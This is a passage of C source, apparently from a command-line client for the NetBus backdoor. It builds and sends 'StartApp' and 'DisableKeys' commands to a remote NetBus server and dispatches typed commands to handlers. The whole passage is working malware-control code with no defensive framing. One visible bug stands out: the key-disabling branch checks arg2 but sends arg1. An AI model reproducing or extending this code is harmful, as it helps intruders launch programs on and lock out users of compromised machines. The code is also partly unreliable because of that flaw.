	return 0;
}

int cmd_nb_startapp(char *arg1, char *arg2)
{
	char buff[BUFFSIZE];

	if (!strlen(arg1)) {
		printf("Please specify app to start\n");
		return 1;
	}
	sprintf(buff, "StartApp;%s;\r\n", arg1);
	send_netbus_command(buff);
	return 0;
}

int cmd_nb_keys(char *arg1, char *arg2)
{
	char buff[BUFFSIZE];

	if (!strlen(arg1)) {
		printf("Must specify mode (`on' or `off')\n");
		return 1;
	}
	if (strncasecmp(arg1, "ON", strlen(arg1)) == 0) {
		if (!strlen(arg2)) {
			printf("Please specify which keys to disable\n");
			return 1;
		}
		sprintf(buff, "DisableKeys;1;%s\r\n", arg1);
		send_netbus_command(buff);
	}
	if (strncasecmp(arg1, "OFF", strlen(arg1)) == 0)
		send_netbus_command("DisableKeys;0;\r\n");
	return 0;
}


/* Main command executor */
int executecommand(char *command, char *arg1, char *arg2)
{
	struct COMMAND *cmds, *cmd;
	int i, ambig;

	cmd = (struct COMMAND *) NULL;
	ambig = 0;
	if (!command)
		return -1;
	if (strlen(command) == 0)
		return 0;
	if (!(cmds = get_commands()))
		return -1;
	for (i = 0; cmds[i].cmd != (char *) NULL; i++) {
		if (strncasecmp(command, cmds[i].cmd, strlen(command)) == 0) {
			if (cmd == (struct COMMAND *) NULL ||
				strcasecmp(command, cmds[i].cmd) == 0)
				cmd = &cmds[i];
			else {
				if (strcasecmp(command, cmd->cmd) != 0) {
					ambig = 1;
					break;
				}
			}
		}
	}
	if (ambig) {
		printf("%s: Command is ambigous\n", command);
		return 0;
	} else {
		if (!cmd) {
			printf("%s: Unknown command. Enter `help' for assistance.\n", command);
			return -1;
		} else {
			if (!cmd->proc) {
				printf("%s: Command not implemented.\n", cmd->cmd);
				return 0;
			} else
				return cmd->proc(arg1, arg2);
		}
	}
}

